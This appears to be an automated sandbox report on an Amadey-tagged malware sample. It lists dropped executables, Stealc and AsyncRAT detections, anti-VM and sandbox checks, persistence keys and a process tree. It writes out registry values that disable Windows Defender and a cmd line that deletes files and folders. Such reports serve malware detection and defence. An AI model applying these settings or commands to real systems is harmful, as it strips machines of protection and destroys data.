amadey | 1136566f5c896c8a2218126b2c4dbe67a6fd83bf808fd2de735458a6422f0636

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	4L684S.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	4L684S.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	4L684S.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	4L684S.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	4L684S.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	4L684S.exe

Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc

Async RAT payload 2 IoCs

rat

resource	yara_rule
behavioral1/memory/4944-99-0x0000000000210000-0x0000000000672000-memory.dmp	family_asyncrat
behavioral1/memory/4944-100-0x0000000000210000-0x0000000000672000-memory.dmp	family_asyncrat

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	0858ba6bc7.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	3d69R.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	3EUEYgl.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	f3745b045c.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	4L684S.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	H3tyh96.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	f47698ce5b.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	1c55e6.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	2g5323.exe

Downloads MZ/PE file

Checks BIOS information in registry 2 TTPs 24 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	0858ba6bc7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2g5323.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	4L684S.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3EUEYgl.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	f47698ce5b.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	f3745b045c.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1c55e6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2g5323.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	H3tyh96.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	0858ba6bc7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3d69R.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	H3tyh96.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	f47698ce5b.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3EUEYgl.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	f3745b045c.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1c55e6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3d69R.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	4L684S.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	1c55e6.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	skotes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	3EUEYgl.exe

Executes dropped EXE 17 IoCs

pid	Process
1456	g1t41.exe
2916	j7v75.exe
5016	1c55e6.exe
3192	skotes.exe
1384	2g5323.exe
2720	3d69R.exe
3360	4L684S.exe
1904	Z9Pp9pM.exe
4944	H3tyh96.exe
3288	skotes.exe
2508	yiklfON.exe
4932	3EUEYgl.exe
2900	skotes.exe
4192	f47698ce5b.exe
4348	f3745b045c.exe
3168	0858ba6bc7.exe
4836	a0897fb31f.exe

Identifies Wine through registry keys 2 TTPs 12 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine	f47698ce5b.exe
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine	f3745b045c.exe
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine	0858ba6bc7.exe
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine	3d69R.exe
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine	4L684S.exe
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine	3EUEYgl.exe
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine	1c55e6.exe
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine	2g5323.exe
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine	H3tyh96.exe
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine	skotes.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	4L684S.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	4L684S.exe

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	1136566f5c896c8a2218126b2c4dbe67a6fd83bf808fd2de735458a6422f0636.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	g1t41.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	j7v75.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\f3745b045c.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1013795001\\f3745b045c.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0858ba6bc7.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1013796001\\0858ba6bc7.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a0897fb31f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1013797001\\a0897fb31f.exe"	skotes.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x000300000001e0d0-270.dat	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs

pid	Process
5016	1c55e6.exe
3192	skotes.exe
1384	2g5323.exe
2720	3d69R.exe
3360	4L684S.exe
4944	H3tyh96.exe
3288	skotes.exe
4932	3EUEYgl.exe
2900	skotes.exe
4192	f47698ce5b.exe
4348	f3745b045c.exe
3168	0858ba6bc7.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\skotes.job	1c55e6.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 25 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	0858ba6bc7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3d69R.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4L684S.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	H3tyh96.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f47698ce5b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	g1t41.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yiklfON.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3EUEYgl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language	a0897fb31f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f3745b045c.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage	a0897fb31f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1136566f5c896c8a2218126b2c4dbe67a6fd83bf808fd2de735458a6422f0636.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	j7v75.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1c55e6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2g5323.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	skotes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Z9Pp9pM.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	a0897fb31f.exe

Checks processor information in registry 2 TTPs 10 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	3EUEYgl.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	3EUEYgl.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe

Delays execution with timeout.exe 1 IoCs

pid	Process
1460	timeout.exe

Kills process with taskkill 5 IoCs

pid	Process
4772	taskkill.exe
1592	taskkill.exe
4924	taskkill.exe
4620	taskkill.exe
3112	taskkill.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings	firefox.exe

Suspicious behavior: EnumeratesProcesses 35 IoCs

pid	Process
5016	1c55e6.exe
5016	1c55e6.exe
3192	skotes.exe
3192	skotes.exe
1384	2g5323.exe
1384	2g5323.exe
2720	3d69R.exe
2720	3d69R.exe
3360	4L684S.exe
3360	4L684S.exe
3360	4L684S.exe
3360	4L684S.exe
4944	H3tyh96.exe
4944	H3tyh96.exe
4944	H3tyh96.exe
4944	H3tyh96.exe
4944	H3tyh96.exe
3288	skotes.exe
3288	skotes.exe
4932	3EUEYgl.exe
4932	3EUEYgl.exe
4932	3EUEYgl.exe
4932	3EUEYgl.exe
2900	skotes.exe
2900	skotes.exe
4192	f47698ce5b.exe
4192	f47698ce5b.exe
4348	f3745b045c.exe
4348	f3745b045c.exe
3168	0858ba6bc7.exe
3168	0858ba6bc7.exe
4836	a0897fb31f.exe
4836	a0897fb31f.exe
4836	a0897fb31f.exe
4836	a0897fb31f.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

description	pid	Process
Token: SeDebugPrivilege	3360	4L684S.exe
Token: SeDebugPrivilege	4944	H3tyh96.exe
Token: SeDebugPrivilege	4772	taskkill.exe
Token: SeDebugPrivilege	1592	taskkill.exe
Token: SeDebugPrivilege	4924	taskkill.exe
Token: SeDebugPrivilege	4620	taskkill.exe
Token: SeDebugPrivilege	3112	taskkill.exe
Token: SeDebugPrivilege	3524	firefox.exe
Token: SeDebugPrivilege	3524	firefox.exe

Suspicious use of FindShellTrayWindow 33 IoCs

pid	Process
5016	1c55e6.exe
4836	a0897fb31f.exe
4836	a0897fb31f.exe
4836	a0897fb31f.exe
4836	a0897fb31f.exe
4836	a0897fb31f.exe
4836	a0897fb31f.exe
4836	a0897fb31f.exe
3524	firefox.exe
3524	firefox.exe
3524	firefox.exe
3524	firefox.exe
3524	firefox.exe
3524	firefox.exe
3524	firefox.exe
3524	firefox.exe
3524	firefox.exe
3524	firefox.exe
3524	firefox.exe
3524	firefox.exe
3524	firefox.exe
3524	firefox.exe
3524	firefox.exe
3524	firefox.exe
3524	firefox.exe
3524	firefox.exe
3524	firefox.exe
3524	firefox.exe
3524	firefox.exe
4836	a0897fb31f.exe
4836	a0897fb31f.exe
4836	a0897fb31f.exe
4836	a0897fb31f.exe

Suspicious use of SendNotifyMessage 31 IoCs

pid	Process
4836	a0897fb31f.exe
4836	a0897fb31f.exe
4836	a0897fb31f.exe
4836	a0897fb31f.exe
4836	a0897fb31f.exe
4836	a0897fb31f.exe
4836	a0897fb31f.exe
3524	firefox.exe
3524	firefox.exe
3524	firefox.exe
3524	firefox.exe
3524	firefox.exe
3524	firefox.exe
3524	firefox.exe
3524	firefox.exe
3524	firefox.exe
3524	firefox.exe
3524	firefox.exe
3524	firefox.exe
3524	firefox.exe
3524	firefox.exe
3524	firefox.exe
3524	firefox.exe
3524	firefox.exe
3524	firefox.exe
3524	firefox.exe
3524	firefox.exe
4836	a0897fb31f.exe
4836	a0897fb31f.exe
4836	a0897fb31f.exe
4836	a0897fb31f.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
4944	H3tyh96.exe
3524	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5048 wrote to memory of 1456	5048	1136566f5c896c8a2218126b2c4dbe67a6fd83bf808fd2de735458a6422f0636.exe	82
PID 5048 wrote to memory of 1456	5048	1136566f5c896c8a2218126b2c4dbe67a6fd83bf808fd2de735458a6422f0636.exe	82
PID 5048 wrote to memory of 1456	5048	1136566f5c896c8a2218126b2c4dbe67a6fd83bf808fd2de735458a6422f0636.exe	82
PID 1456 wrote to memory of 2916	1456	g1t41.exe	83
PID 1456 wrote to memory of 2916	1456	g1t41.exe	83
PID 1456 wrote to memory of 2916	1456	g1t41.exe	83
PID 2916 wrote to memory of 5016	2916	j7v75.exe	84
PID 2916 wrote to memory of 5016	2916	j7v75.exe	84
PID 2916 wrote to memory of 5016	2916	j7v75.exe	84
PID 5016 wrote to memory of 3192	5016	1c55e6.exe	85
PID 5016 wrote to memory of 3192	5016	1c55e6.exe	85
PID 5016 wrote to memory of 3192	5016	1c55e6.exe	85
PID 2916 wrote to memory of 1384	2916	j7v75.exe	86
PID 2916 wrote to memory of 1384	2916	j7v75.exe	86
PID 2916 wrote to memory of 1384	2916	j7v75.exe	86
PID 1456 wrote to memory of 2720	1456	g1t41.exe	87
PID 1456 wrote to memory of 2720	1456	g1t41.exe	87
PID 1456 wrote to memory of 2720	1456	g1t41.exe	87
PID 5048 wrote to memory of 3360	5048	1136566f5c896c8a2218126b2c4dbe67a6fd83bf808fd2de735458a6422f0636.exe	88
PID 5048 wrote to memory of 3360	5048	1136566f5c896c8a2218126b2c4dbe67a6fd83bf808fd2de735458a6422f0636.exe	88
PID 5048 wrote to memory of 3360	5048	1136566f5c896c8a2218126b2c4dbe67a6fd83bf808fd2de735458a6422f0636.exe	88
PID 3192 wrote to memory of 1904	3192	skotes.exe	96
PID 3192 wrote to memory of 1904	3192	skotes.exe	96
PID 3192 wrote to memory of 1904	3192	skotes.exe	96
PID 3192 wrote to memory of 4944	3192	skotes.exe	98
PID 3192 wrote to memory of 4944	3192	skotes.exe	98
PID 3192 wrote to memory of 4944	3192	skotes.exe	98
PID 3192 wrote to memory of 2508	3192	skotes.exe	102
PID 3192 wrote to memory of 2508	3192	skotes.exe	102
PID 3192 wrote to memory of 2508	3192	skotes.exe	102
PID 3192 wrote to memory of 4932	3192	skotes.exe	104
PID 3192 wrote to memory of 4932	3192	skotes.exe	104
PID 3192 wrote to memory of 4932	3192	skotes.exe	104
PID 4932 wrote to memory of 652	4932	3EUEYgl.exe	105
PID 4932 wrote to memory of 652	4932	3EUEYgl.exe	105
PID 4932 wrote to memory of 652	4932	3EUEYgl.exe	105
PID 652 wrote to memory of 1460	652	cmd.exe	107
PID 652 wrote to memory of 1460	652	cmd.exe	107
PID 652 wrote to memory of 1460	652	cmd.exe	107
PID 3192 wrote to memory of 4192	3192	skotes.exe	109
PID 3192 wrote to memory of 4192	3192	skotes.exe	109
PID 3192 wrote to memory of 4192	3192	skotes.exe	109
PID 3192 wrote to memory of 4348	3192	skotes.exe	110
PID 3192 wrote to memory of 4348	3192	skotes.exe	110
PID 3192 wrote to memory of 4348	3192	skotes.exe	110
PID 3192 wrote to memory of 3168	3192	skotes.exe	111
PID 3192 wrote to memory of 3168	3192	skotes.exe	111
PID 3192 wrote to memory of 3168	3192	skotes.exe	111
PID 3192 wrote to memory of 4836	3192	skotes.exe	112
PID 3192 wrote to memory of 4836	3192	skotes.exe	112
PID 3192 wrote to memory of 4836	3192	skotes.exe	112
PID 4836 wrote to memory of 4772	4836	a0897fb31f.exe	113
PID 4836 wrote to memory of 4772	4836	a0897fb31f.exe	113
PID 4836 wrote to memory of 4772	4836	a0897fb31f.exe	113
PID 4836 wrote to memory of 1592	4836	a0897fb31f.exe	115
PID 4836 wrote to memory of 1592	4836	a0897fb31f.exe	115
PID 4836 wrote to memory of 1592	4836	a0897fb31f.exe	115
PID 4836 wrote to memory of 4924	4836	a0897fb31f.exe	117
PID 4836 wrote to memory of 4924	4836	a0897fb31f.exe	117
PID 4836 wrote to memory of 4924	4836	a0897fb31f.exe	117
PID 4836 wrote to memory of 4620	4836	a0897fb31f.exe	119
PID 4836 wrote to memory of 4620	4836	a0897fb31f.exe	119
PID 4836 wrote to memory of 4620	4836	a0897fb31f.exe	119
PID 4836 wrote to memory of 3112	4836	a0897fb31f.exe	121

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\1136566f5c896c8a2218126b2c4dbe67a6fd83bf808fd2de735458a6422f0636.exe
"C:\Users\Admin\AppData\Local\Temp\1136566f5c896c8a2218126b2c4dbe67a6fd83bf808fd2de735458a6422f0636.exe"
1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5048
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\g1t41.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\g1t41.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1456
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\j7v75.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\j7v75.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2916
  - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1c55e6.exe
      C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1c55e6.exe
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:5016
    - - C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Adds Run key to start application
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:3192
      - C:\Users\Admin\AppData\Local\Temp\1013644001\Z9Pp9pM.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1013644001\Z9Pp9pM.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1904
      - C:\Users\Admin\AppData\Local\Temp\1013675001\H3tyh96.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1013675001\H3tyh96.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:4944
      - C:\Users\Admin\AppData\Local\Temp\1013765001\yiklfON.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1013765001\yiklfON.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2508
      - C:\Users\Admin\AppData\Local\Temp\1013771001\3EUEYgl.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1013771001\3EUEYgl.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:4932
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\1013771001\3EUEYgl.exe" & rd /s /q "C:\ProgramData\K6PZCBASJEKF" & exit
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:652
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        8⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:1460
      - C:\Users\Admin\AppData\Local\Temp\1013794001\f47698ce5b.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1013794001\f47698ce5b.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4192
      - C:\Users\Admin\AppData\Local\Temp\1013795001\f3745b045c.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1013795001\f3745b045c.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4348
      - C:\Users\Admin\AppData\Local\Temp\1013796001\0858ba6bc7.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1013796001\0858ba6bc7.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3168
      - C:\Users\Admin\AppData\Local\Temp\1013797001\a0897fb31f.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1013797001\a0897fb31f.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
